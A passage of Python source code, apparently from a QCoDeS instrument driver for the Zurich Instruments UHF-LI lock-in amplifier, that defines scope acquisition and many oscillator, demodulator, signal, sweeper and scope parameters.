delay = params['scope_trig_delay'].get()
starttime = params['scope_trig_reference'].get()*0.01*duration + delay
stoptime = starttime + duration
setpointlist = tuple(np.linspace(starttime, stoptime, npts)) # x-axis
spname = 'Time'
namestr = f"scope_channel{1}_input"
name1 = inputnames[params[namestr].get()]
unit1 = inputunits[params[namestr].get()]
namestr = f"scope_channel{2}_input"
name2 = inputnames[params[namestr].get()]
unit2 = inputunits[params[namestr].get()]
self.setpoints = ((tuple(range(segs)), (setpointlist,)*segs),)*2
#self.setpoints = ((setpointlist,)*segs,)*2
self.setpoint_names = (('Segments', 'Time'), ('Segments', 'Time'))
self.names = (name1, name2)
self.units = (unit1, unit2)
self.labels = ('Scope channel 1', 'Scope channel 2')
self.shapes = ((segs, npts), (segs, npts))
self.instrument.daq.sync()
self.instrument.scope_correctly_built = True
def get_raw(self):
"""
Acquire data from the scope.
Returns:
tuple: Tuple of two n X m arrays where n is the number of segments
and m is the number of points in the scope trace.
Raises:
ValueError: If the scope has not been prepared by running the
prepare_scope function.
"""
t_start = time.monotonic()
log.info('Scope get method called')
if not self.instrument.scope_correctly_built:
raise ValueError('Scope not properly prepared. Please run '
'prepare_scope before measuring.')
# A convenient reference
params = self.instrument.parameters
#
chans = {1: (True, False), 2: (False, True), 3: (True, True)}
channels = chans[params['scope_channels'].get()]
if params['scope_trig_holdoffmode'].get_latest() == 'events':
raise NotImplementedError('Scope trigger holdoff in number of '
'events not supported. Please specify '
'holdoff in seconds.')
#######################################################
# The following steps SEEM to give the correct result
# Make sure all settings have taken effect
self.instrument.daq.sync()
# Calculate the time needed for the measurement. We often have failed
# measurements, so a timeout is needed.
if params['scope_segments'].get() == 'ON':
segs = params['scope_segments_count'].get()
else:
segs = 1
deadtime = params['scope_trig_holdoffseconds'].get_latest()
# We add one second to account for latencies and random delays
meas_time = segs*(params['scope_duration'].get()+deadtime)+1
npts = params['scope_length'].get()
zi_error = True
error_counter = 0
num_retries = 10
timedout = False
while (zi_error or timedout) and error_counter < num_retries:
# one shot per trigger. This needs to be set every time
# the scope is enabled as below using scope_runstop
try:
# we wrap this in try finally to ensure that
# scope.finish is always called even if the
# measurement is interrupted
self.instrument.daq.setInt(
f"/{self.instrument.device}/scopes/0/single", 1
)
scope = self.instrument.scope
scope.set('scopeModule/clearhistory', 1)
# Start the scope triggering/acquiring
# set /dev/scopes/0/enable to 1
params['scope_runstop'].set('run')
self.instrument.daq.sync()
log.debug('Starting ZI scope acquisition.')
# Start something... hauling data from the scopeModule?
scope.execute()
# Now perform actions that may produce data, e.g. running an AWG
for action in self._scopeactions:
action()
starttime = time.time()
timedout = False
progress = scope.progress()
while progress < 1:
log.debug(f'Scope progress is {progress}')
progress = scope.progress()
time.sleep(0.1) # This while+sleep is how ZI engineers do it
if (time.time()-starttime) > 20*meas_time+1:
timedout = True
break
metadata = scope.get("scopeModule/*")
zi_error = bool(metadata['error'][0])
# Stop the scope from running
params['scope_runstop'].set('stop')
if not (timedout or zi_error):
log.info('[+] ZI scope acquisition completed OK')
rawdata = scope.read()
if "error" in rawdata:
zi_error = bool(rawdata["error"][0])
data = self._scopedataparser(
rawdata, self.instrument.device, npts, segs, channels
)
else:
log.warning('[-] ZI scope acquisition attempt {} '
'failed, Timeout: {}, Error: {}, '
'retrying'.format(error_counter, timedout, zi_error))
rawdata = None
data = (None, None)
error_counter += 1
if error_counter >= num_retries:
log.error('[+] ZI scope acquisition failed, maximum number '
'of retries performed. No data returned')
raise RuntimeError('[+] ZI scope acquisition failed, maximum number '
'of retries performed. No data returned')
finally:
# cleanup and make ready for next scope acquisition
scope.finish()
t_stop = time.monotonic()
log.info('scope get method returning after {} s'.format(t_stop -
t_start))
return data
@staticmethod
def _scopedataparser(rawdata, deviceID, scopelength, segments, channels):
"""
Cast the scope return value dict into a tuple.
Args:
rawdata (dict): The return of scopeModule.read()
deviceID (str): The device ID string of the instrument.
scopelength (int): The length of each segment
segments (int): The number of segments
channels (tuple): Tuple of two bools controlling what data to return
(True, False) will return data for channel 1 etc.
Returns:
tuple: A 2-tuple of either None or np.array with dimensions
segments x scopelength.
"""
data = rawdata[f'{deviceID}']['scopes']['0']['wave'][0][0]
if channels[0]:
ch1data = data['wave'][0].reshape(segments, scopelength)
else:
ch1data = None
if channels[1]:
ch2data = data['wave'][1].reshape(segments, scopelength)
else:
ch2data = None
return (ch1data, ch2data)
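# Usage sketch (not part of the upstream driver; assumes the ZIUHFLI instrument below
# exposes this class as a `Scope` parameter, analogous to `Sweep`):
#   uhfli.scope_channels(1)                        # record channel 1 only
#   uhfli.scope_channel1_input('Signal Input 1')
#   uhfli.scope_samplingrate('56.2 MHz')
#   uhfli.scope_length(4096)
#   uhfli.Scope.prepare_scope()
#   ch1, ch2 = uhfli.Scope.get()                   # ch2 is None in this configuration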
class ZIUHFLI(Instrument):
"""
QCoDeS driver for ZI UHF-LI.
Currently implementing demodulator settings and the sweeper functionality.
Requires ZI Lab One software to be installed on the computer running QCoDeS.
Furthermore, the Data Server and Web Server must be running and a connection
between the two must be made.
TODOs:
* Add zoom-FFT
"""
@deprecate(reason="There is a new UHFLI driver from Zurich Instruments",
alternative="instrument_drivers.zurich_instruments.uhfli.UHFLI")
def __init__(self, name: str, device_ID: str, **kwargs) -> None:
"""
Create an instance of the instrument.
Args:
name (str): The internal QCoDeS name of the instrument
device_ID (str): The device name as listed in the web server.
"""
super().__init__(name, **kwargs)
self.api_level = 5
zisession = zhinst.utils.create_api_session(device_ID, self.api_level)
(self.daq, self.device, self.props) = zisession
self.daq.setDebugLevel(3)
# create (instantiate) an instance of each module we will use
self.sweeper = self.daq.sweep()
self.sweeper.set('sweep/device', self.device)
self.scope = self.daq.scopeModule()
self.scope.subscribe(f'/{self.device}/scopes/0/wave')
########################################
# INSTRUMENT PARAMETERS
########################################
# Oscillators
number_of_oscillators = 8 if 'MF' in self.props['options'] else 2
for oscs in range(1, number_of_oscillators + 1):
self.add_parameter(f'oscillator{oscs}_freq',
label=f'Frequency of oscillator {oscs}',
unit='Hz',
set_cmd=partial(self._setter, 'oscs',
oscs-1, 1, 'freq'),
get_cmd=partial(self._getter, 'oscs',
oscs-1, 1, 'freq'),
vals=vals.Numbers(0, 600e6))
self.add_parameter(f'demod{oscs}_oscillator',
label=f'Selected oscillator {oscs}',
docstring="Connects the demodulator with the "
"supplied oscillator.",
get_cmd=partial(self._getter, 'demods',
oscs - 1, 0, 'oscselect'),
set_cmd=partial(self._setter, 'demods',
oscs - 1, 0, 'oscselect'),
val_mapping={i + 1: i for i in
range(number_of_oscillators)})
########################################
# DEMODULATOR PARAMETERS
for demod in range(1, 9):
self.add_parameter(f'demod{demod}_order',
label='Filter order',
get_cmd=partial(self._getter, 'demods',
demod-1, 0, 'order'),
set_cmd=partial(self._setter, 'demods',
demod-1, 0, 'order'),
vals=vals.Ints(1, 8)
)
self.add_parameter(f'demod{demod}_harmonic',
label=('Reference frequency multiplication' +
' factor'),
get_cmd=partial(self._getter, 'demods',
demod-1, 0, 'harmonic'),
set_cmd=partial(self._setter, 'demods',
demod-1, 0, 'harmonic'),
vals=vals.Ints(1, 999)
)
self.add_parameter(f'demod{demod}_timeconstant',
label='Filter time constant',
get_cmd=partial(self._getter, 'demods',
demod-1, 1, 'timeconstant'),
set_cmd=partial(self._setter, 'demods',
demod-1, 1, 'timeconstant'),
unit='s'
)
self.add_parameter(f'demod{demod}_samplerate',
label='Sample rate',
get_cmd=partial(self._getter, 'demods',
demod-1, 1, 'rate'),
set_cmd=partial(self._setter, 'demods',
demod-1, 1, 'rate'),
unit='Sa/s',
docstring="""
Note: the value inserted by the user
may be approximated to the
nearest value supported by the
instrument.
""")
self.add_parameter(f'demod{demod}_phaseshift',
label='Phase shift',
unit='degrees',
get_cmd=partial(self._getter, 'demods',
demod-1, 1, 'phaseshift'),
set_cmd=partial(self._setter, 'demods',
demod-1, 1, 'phaseshift')
)
# val_mapping for the demodX_signalin parameter
dmsigins = {'Sig In 1': 0,
'Sig In 2': 1,
'Trigger 1': 2,
'Trigger 2': 3,
'Aux Out 1': 4,
'Aux Out 2': 5,
'Aux Out 3': 6,
'Aux Out 4': 7,
'Aux In 1': 8,
'Aux In 2': 9,
'Phi Demod 4': 10,
'Phi Demod 8': 11}
self.add_parameter(f'demod{demod}_signalin',
label='Signal input',
get_cmd=partial(self._getter, 'demods',
demod-1, 0,'adcselect'),
set_cmd=partial(self._setter, 'demods',
demod-1, 0, 'adcselect'),
val_mapping=dmsigins,
vals=vals.Enum(*list(dmsigins.keys()))
)
self.add_parameter(f'demod{demod}_sinc',
label='Sinc filter',
get_cmd=partial(self._getter, 'demods',
demod-1, 0, 'sinc'),
set_cmd=partial(self._setter, 'demods',
demod-1, 0, 'sinc'),
val_mapping={'ON': 1, 'OFF': 0},
vals=vals.Enum('ON', 'OFF')
)
self.add_parameter(f'demod{demod}_streaming',
label='Data streaming',
get_cmd=partial(self._getter, 'demods',
demod-1, 0, 'enable'),
set_cmd=partial(self._setter, 'demods',
demod-1, 0, 'enable'),
val_mapping={'ON': 1, 'OFF': 0},
vals=vals.Enum('ON', 'OFF')
)
dmtrigs = {'Continuous': 0,
'Trigger in 3 Rise': 1,
'Trigger in 3 Fall': 2,
'Trigger in 3 Both': 3,
'Trigger in 3 High': 32,
'Trigger in 3 Low': 16,
'Trigger in 4 Rise': 4,
'Trigger in 4 Fall': 8,
'Trigger in 4 Both': 12,
'Trigger in 4 High': 128,
'Trigger in 4 Low': 64,
'Trigger in 3|4 Rise': 5,
'Trigger in 3|4 Fall': 10,
'Trigger in 3|4 Both': 15,
'Trigger in 3|4 High': 160,
'Trigger in 3|4 Low': 80}
self.add_parameter(f'demod{demod}_trigger',
label='Trigger',
get_cmd=partial(self._getter, 'demods',
demod-1, 0, 'trigger'),
set_cmd=partial(self._setter, 'demods',
demod-1, 0, 'trigger'),
val_mapping=dmtrigs,
vals=vals.Enum(*list(dmtrigs.keys()))
)
self.add_parameter(f'demod{demod}_sample',
label='Demod sample',
get_cmd=partial(self._getter, 'demods',
demod - 1, 2, 'sample'),
snapshot_value=False
)
for demod_param in ['x', 'y', 'R', 'phi']:
if demod_param in ('x', 'y', 'R'):
unit = 'V'
else:
unit = 'deg'
self.add_parameter(f'demod{demod}_{demod_param}',
label=f'Demod {demod} {demod_param}',
get_cmd=partial(self._get_demod_sample,
demod - 1, demod_param),
snapshot_value=False,
unit=unit
)
########################################
# SIGNAL INPUTS
for sigin in range(1, 3):
self.add_parameter(f'signal_input{sigin}_range',
label='Input range',
set_cmd=partial(self._setter, 'sigins',
sigin-1, 1, 'range'),
get_cmd=partial(self._getter, 'sigins',
sigin-1, 1, 'range'),
unit='V')
self.add_parameter(f'signal_input{sigin}_scaling',
label='Input scaling',
set_cmd=partial(self._setter, 'sigins',
sigin-1, 1, 'scaling'),
get_cmd=partial(self._getter, 'sigins',
sigin-1, 1, 'scaling'),
)
self.add_parameter(f'signal_input{sigin}_AC',
label='AC coupling',
set_cmd=partial(self._setter,'sigins',
sigin-1, 0, 'ac'),
get_cmd=partial(self._getter, 'sigins',
sigin-1, 0, 'ac'),
val_mapping={'ON': 1, 'OFF': 0},
vals=vals.Enum('ON', 'OFF')
)
self.add_parameter(f'signal_input{sigin}_impedance',
label='Input impedance',
set_cmd=partial(self._setter, 'sigins',
sigin-1, 0, 'imp50'),
get_cmd=partial(self._getter, 'sigins',
sigin-1, 0, 'imp50'),
val_mapping={50: 1, 1000: 0},
vals=vals.Enum(50, 1000)
)
sigindiffs = {'Off': 0, 'Inverted': 1, 'Input 1 - Input 2': 2,
'Input 2 - Input 1': 3}
self.add_parameter(f'signal_input{sigin}_diff',
label='Input signal subtraction',
set_cmd=partial(self._setter, 'sigins',
sigin-1, 0, 'diff'),
get_cmd=partial(self._getter, 'sigins',
sigin-1, 0, 'diff'),
val_mapping=sigindiffs,
vals=vals.Enum(*list(sigindiffs.keys())))
########################################
# SIGNAL OUTPUTS
outputamps = {1: 'amplitudes/3', 2: 'amplitudes/7'}
outputampenable = {1: 'enables/3', 2: 'enables/7'}
for sigout in range(1,3):
self.add_parameter(f'signal_output{sigout}_on',
label='Turn signal output on and off.',
set_cmd=partial(self._sigout_setter,
sigout-1, 0, 'on'),
get_cmd=partial(self._sigout_getter,
sigout-1, 0, 'on'),
val_mapping={'ON': 1, 'OFF': 0},
vals=vals.Enum('ON', 'OFF') )
self.add_parameter(f'signal_output{sigout}_imp50',
label='Switch to turn on 50 Ohm impedance',
set_cmd=partial(self._sigout_setter,
sigout-1, 0, 'imp50'),
get_cmd=partial(self._sigout_getter,
sigout-1, 0, 'imp50'),
val_mapping={'ON': 1, 'OFF': 0},
vals=vals.Enum('ON', 'OFF') )
self.add_parameter(f'signal_output{sigout}_ampdef',
get_cmd=None, set_cmd=None,
initial_value='Vpk',
label="Signal output amplitude's definition",
unit='',
vals=vals.Enum('Vpk', 'Vrms', 'dBm'))
self.add_parameter(f'signal_output{sigout}_range',
label='Signal output range',
set_cmd=partial(self._sigout_setter,
sigout-1, 1, 'range'),
get_cmd=partial(self._sigout_getter,
sigout-1, 1, 'range'),
vals=vals.Enum(0.075, 0.15, 0.75, 1.5))
self.add_parameter(f'signal_output{sigout}_offset',
label='Signal output offset',
set_cmd=partial(self._sigout_setter,
sigout-1, 1, 'offset'),
get_cmd=partial(self._sigout_getter,
sigout-1, 1, 'offset'),
vals=vals.Numbers(-1.5, 1.5),
unit='V')
self.add_parameter(f'signal_output{sigout}_autorange',
label='Enable signal output autorange.',
set_cmd=partial(self._sigout_setter,
sigout-1, 0, 'autorange'),
get_cmd=partial(self._sigout_getter,
sigout-1, 0, 'autorange'),
val_mapping={'ON': 1, 'OFF': 0},
vals=vals.Enum('ON', 'OFF') )
if 'MF' in self.props['options']:
for modeout in range(1, 9):
self.add_parameter(
f'signal_output{sigout}_amplitude{modeout}',
label='Signal output amplitude',
set_cmd=partial(self._sigout_setter,
sigout - 1, 1, 'amplitudes',
output_mode=modeout - 1),
get_cmd=partial(self._sigout_getter,
sigout - 1, 1, 'amplitudes',
output_mode=modeout - 1),
docstring="Set the signal output amplitude. The actual "
"unit and representation is defined by "
"signal_output{}_ampdef "
"parameter".format(sigout))
self.add_parameter(
f'signal_output{sigout}_enable{modeout}',
label="Output signal enabled/disabled.",
set_cmd=partial(self._sigout_setter,
sigout - 1, 0,
'enables', output_mode=modeout - 1),
get_cmd=partial(self._sigout_getter,
sigout - 1, 0,
'enables', output_mode=modeout - 1),
val_mapping=create_on_off_val_mapping(),
docstring="Enabling/Disabling the Signal Output. "
"Corresponds to the blue LED indicator on "
"the instrument front panel.")
else:
self.add_parameter(
f'signal_output{sigout}_enable',
label="Output signal enabled/disabled.",
set_cmd=partial(self._sigout_setter,
sigout - 1, 0,
outputampenable[sigout]),
get_cmd=partial(self._sigout_getter,
sigout - 1, 0,
outputampenable[sigout]),
val_mapping=create_on_off_val_mapping(),
docstring="Enabling/Disabling the Signal Output. "
"Corresponds to the blue LED indicator on "
"the instrument front panel."
)
self.add_parameter(
f'signal_output{sigout}_amplitude',
label='Signal output amplitude',
set_cmd=partial(self._sigout_setter,
sigout - 1, 1,
outputamps[sigout]),
get_cmd=partial(self._sigout_getter,
sigout - 1, 1,
outputamps[sigout]),
docstring="Set the signal output amplitude. The actual unit"
" and representation is defined by "
"signal_output{}_ampdef parameter".format(sigout))
auxoutputchannels = ChannelList(self, "AUXOutputChannels", AUXOutputChannel,
snapshotable=False)
for auxchannum in range(1,5):
name = f'aux_out{auxchannum}'
auxchannel = AUXOutputChannel(self, name, auxchannum)
auxoutputchannels.append(auxchannel)
self.add_submodule(name, auxchannel)
auxoutputchannels.lock()
self.add_submodule('aux_out_channels', auxoutputchannels)
########################################
# SWEEPER PARAMETERS
self.add_parameter('sweeper_BWmode',
label='Sweeper bandwidth control mode',
set_cmd=partial(self._sweep_setter,
'sweep/bandwidthcontrol'),
get_cmd=partial(self._sweep_getter,
'sweep/bandwidthcontrol'),
val_mapping={'auto': 2, 'fixed': 1, 'current': 0},
docstring="""
For each sweep point, the demodulator
filter bandwidth (time constant) may
be set automatically, kept at the
current demodulator bandwidth, or set
to the fixed value given by the
sweeper_BW parameter.
"""
)
self.add_parameter('sweeper_BW',
label='Fixed bandwidth sweeper bandwidth (NEP)',
set_cmd=partial(self._sweep_setter,
'sweep/bandwidth'),
get_cmd=partial(self._sweep_getter,
'sweep/bandwidth'),
docstring="""
This is the NEP bandwidth used by the
sweeper if sweeper_BWmode is set to
'fixed'. If sweeper_BWmode is either
'auto' or 'current', this value is
ignored.
"""
)
self.add_parameter('sweeper_start',
label='Start value of the sweep',
set_cmd=partial(self._sweep_setter,
'sweep/start'),
get_cmd=partial(self._sweep_getter,
'sweep/start'),
vals=vals.Numbers(0, 600e6))
self.add_parameter('sweeper_stop',
label='Stop value of the sweep',
set_cmd=partial(self._sweep_setter,
'sweep/stop'),
get_cmd=partial(self._sweep_getter,
'sweep/stop'),
vals=vals.Numbers(0, 600e6))
self.add_parameter('sweeper_samplecount',
label='Length of the sweep (pts)',
set_cmd=partial(self._sweep_setter,
'sweep/samplecount'),
get_cmd=partial(self._sweep_getter,
'sweep/samplecount'),
vals=vals.Ints(0, 100000))
# val_mapping for sweeper_param parameter
sweepparams = {'Aux Out 1 Offset': 'auxouts/0/offset',
'Aux Out 2 Offset': 'auxouts/1/offset',
'Aux Out 3 Offset': 'auxouts/2/offset',
'Aux Out 4 Offset': 'auxouts/3/offset',
'Demod 1 Phase Shift': 'demods/0/phaseshift',
'Demod 2 Phase Shift': 'demods/1/phaseshift',
'Demod 3 Phase Shift': 'demods/2/phaseshift',
'Demod 4 Phase Shift': 'demods/3/phaseshift',
'Demod 5 Phase Shift': 'demods/4/phaseshift',
'Demod 6 Phase Shift': 'demods/5/phaseshift',
'Demod 7 Phase Shift': 'demods/6/phaseshift',
'Demod 8 Phase Shift': 'demods/7/phaseshift',
'Osc 1 Frequency': 'oscs/0/freq',
'Osc 2 Frequency': 'oscs/1/freq',
'Output 1 Amplitude 4': 'sigouts/0/amplitudes/3',
'Output 1 Offset': 'sigouts/0/offset',
'Output 2 Amplitude 8': 'sigouts/1/amplitudes/7',
'Output 2 Offset': 'sigouts/1/offset'
}
self.add_parameter('sweeper_param',
label='Parameter to sweep (sweep x-axis)',
set_cmd=partial(self._sweep_setter,
'sweep/gridnode'),
val_mapping=sweepparams,
get_cmd=partial(self._sweep_getter,
'sweep/gridnode'),
vals=vals.Enum(*list(sweepparams.keys()))
)
# val_mapping for sweeper_units parameter
sweepunits = {'Aux Out 1 Offset': 'V',
'Aux Out 2 Offset': 'V',
'Aux Out 3 Offset': 'V',
'Aux Out 4 Offset': 'V',
'Demod 1 Phase Shift': 'degrees',
'Demod 2 Phase Shift': 'degrees',
'Demod 3 Phase Shift': 'degrees',
'Demod 4 Phase Shift': 'degrees',
'Demod 5 Phase Shift': 'degrees',
'Demod 6 Phase Shift': 'degrees',
'Demod 7 Phase Shift': 'degrees',
'Demod 8 Phase Shift': 'degrees',
'Osc 1 Frequency': 'Hz',
'Osc 2 Frequency': 'Hz',
'Output 1 Amplitude 4': 'V',
'Output 1 Offset': 'V',
'Output 2 Amplitude 8': 'V',
'Output 2 Offset': 'V'
}
self.add_parameter('sweeper_units',
label='Units of sweep x-axis',
get_cmd=self.sweeper_param.get,
get_parser=lambda x:sweepunits[x])
# val_mapping for sweeper_mode parameter
sweepmodes = {'Sequential': 0,
'Binary': 1,
'Biderectional': 2,
'Reverse': 3}
self.add_parameter('sweeper_mode',
label='Sweep mode',
set_cmd=partial(self._sweep_setter,
'sweep/scan'),
get_cmd=partial(self._sweep_getter, 'sweep/scan'),
val_mapping=sweepmodes,
vals=vals.Enum(*list(sweepmodes))
)
self.add_parameter('sweeper_order',
label='Sweeper filter order',
set_cmd=partial(self._sweep_setter,
'sweep/order'),
get_cmd=partial(self._sweep_getter,
'sweep/order'),
vals=vals.Ints(1, 8),
docstring="""
This value is invoked only when the
sweeper_BWmode is set to 'fixed'.
""")
self.add_parameter('sweeper_settlingtime',
label=('Minimal settling time for the ' +
'sweeper'),
set_cmd=partial(self._sweep_setter,
'sweep/settling/time'),
get_cmd=partial(self._sweep_getter,
'sweep/settling/time'),
vals=vals.Numbers(0),
unit='s',
docstring="""
This is the minimal waiting time
at each point during a sweep before the
data acquisition starts. Note that the
filter settings may result in a longer
actual waiting/settling time.
"""
)
self.add_parameter('sweeper_inaccuracy',
label='Demodulator filter settling inaccuracy',
set_cmd=partial(self._sweep_setter,
'sweep/settling/inaccuracy'),
docstring="""
Demodulator filter settling inaccuracy
defining the wait time between a sweep
parameter change and recording of the
next sweep point. The settling time is
calculated as the time required to attain
the specified remaining proportion [1e-13,
0.1] of an incoming step function. Typical
inaccuracy values: 10m for highest sweep
speed for large signals, 100u for precise
amplitude measurements, 100n for precise
noise measurements. Depending on the
order of the demodulator filter the settling
inaccuracy will define the number of filter
time constants the sweeper has to wait. The
maximum between this value and the settling
time is taken as wait time until the next
sweep point is recorded.
"""
)
self.add_parameter('sweeper_settlingtc',
label='Sweep filter settling time',
get_cmd=partial(self._sweep_getter,
'sweep/settling/tc'),
unit='',
docstring="""This settling time is in units of
the filter time constant."""
)
self.add_parameter('sweeper_averaging_samples',
label=('Minimal no. of samples to average at ' +
'each sweep point'),
set_cmd=partial(self._sweep_setter,
'sweep/averaging/sample'),
get_cmd=partial(self._sweep_getter,
'sweep/averaging/sample'),
vals=vals.Ints(1),
docstring="""
The actual number of samples is the
maximum of this value and the
sweeper_averaging_time times the
relevant sample rate.
"""
)
self.add_parameter('sweeper_averaging_time',
label=('Minimal averaging time'),
set_cmd=partial(self._sweep_setter,
'sweep/averaging/tc'),
get_cmd=partial(self._sweep_getter,
'sweep/averaging/tc'),
unit='s',
docstring="""
The actual number of samples is the
maximum of this value times the
relevant sample rate and the
sweeper_averaging_samples."""
)
self.add_parameter('sweeper_xmapping',
label='Sweeper x mapping',
set_cmd=partial(self._sweep_setter,
'sweep/xmapping'),
get_cmd=partial(self._sweep_getter,
'sweep/xmapping'),
val_mapping={'lin': 0, 'log': 1}
)
self.add_parameter('sweeper_sweeptime',
label='Expected sweep time',
unit='s',
get_cmd=self._get_sweep_time)
self.add_parameter('sweeper_timeout',
label='Sweep timeout',
unit='s',
initial_value=600,
get_cmd=None, set_cmd=None)
########################################
# THE SWEEP ITSELF
self.add_parameter('Sweep',
parameter_class=Sweep,
)
# A "manual" parameter: a list of the signals for the sweeper
# to subscribe to
self._sweeper_signals = [] # type: List[str]
# This is the dictionary keeping track of the sweeper settings
# These are the default settings
self._sweepdict = {'start': 1e6,
'stop': 10e6,
'samplecount': 25,
'bandwidthcontrol': 1, # fixed mode
'bandwidth': 50,
'gridnode': 'oscs/0/freq',
'scan': 0, # sequential scan
'order': 1,
'settling/time': 1e-6,
'settling/inaccuracy': 10e-3,
'averaging/sample': 25,
'averaging/tc': 100e-3,
'xmapping': 0, # linear
}
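# The defaults above describe a sequential, linear 25-point sweep of oscillator 1
# from 1 MHz to 10 MHz with fixed bandwidth control (sweeper_BW = 50); build_sweep()
# below pushes them to the instrument.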
# Set up the sweeper with the above settings
self.Sweep.build_sweep()
########################################
# SCOPE PARAMETERS
# default parameters:
# This parameter corresponds to the Run/Stop button in the GUI
self.add_parameter('scope_runstop',
label='Scope run state',
set_cmd=partial(self._setter, 'scopes', 0, 0,
'enable'),
get_cmd=partial(self._getter, 'scopes', 0, 0,
'enable'),
val_mapping={'run': 1, 'stop': 0},
vals=vals.Enum('run', 'stop'),
docstring=('This parameter corresponds to the '
'run/stop button in the GUI.'))
self.add_parameter('scope_mode',
label="Scope's mode: time or frequency domain.",
set_cmd=partial(self._scope_setter, 1, 0,
'mode'),
get_cmd=partial(self._scope_getter, 'mode'),
val_mapping={'Time Domain': 1,
'Freq Domain FFT': 3},
vals=vals.Enum('Time Domain', 'Freq Domain FFT')
)
# 1: Channel 1 on, Channel 2 off.
# 2: Channel 1 off, Channel 2 on,
# 3: Channel 1 on, Channel 2 on.
self.add_parameter('scope_channels',
label='Recorded scope channels',
set_cmd=partial(self._scope_setter, 0, 0,
'channel'),
get_cmd=partial(self._getter, 'scopes', 0,
0, 'channel'),
vals=vals.Enum(1, 2, 3)
)
self._samplingrate_codes = {'1.80 GHz': 0,
'900 MHz': 1,
'450 MHz': 2,
'225 MHz': 3,
'113 MHz': 4,
'56.2 MHz': 5,
'28.1 MHz': 6,
'14.0 MHz': 7,
'7.03 MHz': 8,
'3.50 MHz': 9,
'1.75 MHz': 10,
'880 kHz': 11,
'440 kHz': 12,
'220 kHz': 13,
'110 kHz': 14,
'54.9 kHz': 15,
'27.5 kHz': 16}
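# The codes above correspond to sampling rates of 1.8 GHz / 2**code (cf. the
# scope_samplingrate_float validator below), e.g. code 5 -> 1.8e9/32 = 56.25 MHz,
# listed here as '56.2 MHz'.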
self.add_parameter('scope_samplingrate',
label="Scope's sampling rate",
set_cmd=partial(self._scope_setter, 0, 0,
'time'),
get_cmd=partial(self._getter, 'scopes', 0,
0, 'time'),
val_mapping=self._samplingrate_codes,
vals=vals.Enum(*list(self._samplingrate_codes.keys()))
)
self.add_parameter(
"scope_samplingrate_float",
label="Scope's sampling rate as float",
set_cmd=self._set_samplingrate_as_float,
unit="Hz",
get_cmd=self._get_samplingrate_as_float,
vals=vals.Enum(
*(1.8e9 / 2 ** v for v in self._samplingrate_codes.values())
),
docstring=""" A numeric representation of the scope's
samplingrate parameter. Sets and gets the sampling
rate by using the scope_samplingrate parameter."""
)
self.add_parameter('scope_length',
label="Length of scope trace (pts)",
set_cmd=partial(self._scope_setter, 0, 1,
'length'),
get_cmd=partial(self._getter, 'scopes', 0,
1, 'length'),
vals=vals.Numbers(4096, 128000000),
get_parser=int
)
self.add_parameter('scope_duration',
label="Scope trace duration",
set_cmd=partial(self._scope_setter, 0, 0,
'duration'),
get_cmd=partial(self._scope_getter,
'duration'),
vals=vals.Numbers(2.27e-6,4.660e3),
unit='s'
)
# Map the possible input sources to LabOne's IDs.
# The IDs can be seen in log file of LabOne UI
inputselect = {'Signal Input 1': 0,
'Signal Input 2': 1,
'Trig Input 1': 2,
'Trig Input 2': 3,
'Aux Output 1': 4,
'Aux Output 2': 5,
'Aux Output 3': 6,
'Aux Output 4': 7,
'Aux In 1 Ch 1': 8,
'Aux In 1 Ch 2': 9,
'Osc phi Demod 4': 10,
'Osc phi Demod 8': 11,
'AU Cartesian 1': 112,
'AU Cartesian 2': 113,
'AU Polar 1': 128,
'AU Polar 2': 129,
}
# Add all 8 demodulators and their respective parameters
# to inputselect as well.
# Numbers correspond to LabOne IDs, taken from UI log.
for demod in range(1,9):
inputselect[f'Demod {demod} X'] = 15+demod
inputselect[f'Demod {demod} Y'] = 31+demod
inputselect[f'Demod {demod} R'] = 47+demod
inputselect[f'Demod {demod} Phase'] = 63+demod
for channel in range(1, 3):
self.add_parameter(
f"scope_channel{channel}_input",
label=(f"Scope's channel {channel}" + " input source"),
set_cmd=partial(
self._scope_setter, 0, 0, (f"channels/{channel-1}/" + "inputselect")
),
get_cmd=partial(
self._getter,
"scopes",
0,
0,
(f"channels/{channel-1}/" + "inputselect"),
),
val_mapping=inputselect,
vals=vals.Enum(*list(inputselect.keys())),
)
self.add_parameter('scope_average_weight',
label="Scope Averages",
set_cmd=partial(self._scope_setter, 1, 0,
'averager/weight'),
get_cmd=partial(self._scope_getter,
'averager/weight'),
vals=vals.Numbers(min_value=1)
)
self.add_parameter('scope_trig_enable',
label="Enable triggering for scope readout",
set_cmd=partial(self._setter, 'scopes', 0,
0, 'trigenable'),
get_cmd=partial(self._getter, 'scopes', 0,
0, 'trigenable'),
val_mapping={'ON': 1, 'OFF': 0},
vals=vals.Enum('ON', 'OFF')
)
self.add_parameter('scope_trig_signal',
label="Trigger signal source",
set_cmd=partial(self._setter, 'scopes', 0,
0, 'trigchannel'),
get_cmd=partial(self._getter, 'scopes', 0,
0, 'trigchannel'),
val_mapping=inputselect,
vals=vals.Enum(*list(inputselect.keys()))
)
slopes = {'None': 0, 'Rise': 1, 'Fall': 2, 'Both': 3}
self.add_parameter('scope_trig_slope',
label="Scope's triggering slope",
set_cmd=partial(self._setter, 'scopes', 0,
0, 'trigslope'),
get_cmd=partial(self._getter, 'scopes', 0,
0, 'trigslope'),
val_mapping=slopes,
vals=vals.Enum(*list(slopes.keys()))
)
# TODO: figure out how value/percent works for the trigger level
self.add_parameter('scope_trig_level',
label="Scope trigger level",
set_cmd=partial(self._setter, 'scopes', 0,
1, 'triglevel'),
get_cmd=partial(self._getter, 'scopes', 0,
1, 'triglevel'),
vals=vals.Numbers()
)
self.add_parameter('scope_trig_hystmode',
label="Enable triggering for scope readout.",
set_cmd=partial(self._setter, 'scopes', 0,
0, 'trighysteresis/mode'),
get_cmd=partial(self._getter, 'scopes', 0,
0, 'trighysteresis/mode'),
val_mapping={'absolute': 0, 'relative': 1},
vals=vals.Enum('absolute', 'relative')
)
self.add_parameter('scope_trig_hystrelative',
label="Trigger hysteresis, relative value in %",
set_cmd=partial(self._setter, 'scopes', 0,
1, 'trighysteresis/relative'),
get_cmd=partial(self._getter, 'scopes', 0,
1, 'trighysteresis/relative'),
# val_mapping= lambda x: 0.01*x,
vals=vals.Numbers(0)
)
self.add_parameter('scope_trig_hystabsolute',
label="Trigger hysteresis, absolute value",
set_cmd=partial(self._setter, 'scopes', 0,
1, 'trighysteresis/absolute'),
get_cmd=partial(self._getter, 'scopes', 0,
1, 'trighysteresis/absolute'),
vals=vals.Numbers(0, 20)
)
triggates = {'Trigger In 3 High': 0, 'Trigger In 3 Low': 1,
'Trigger In 4 High': 2, 'Trigger In 4 Low': 3}
self.add_parameter('scope_trig_gating_source',
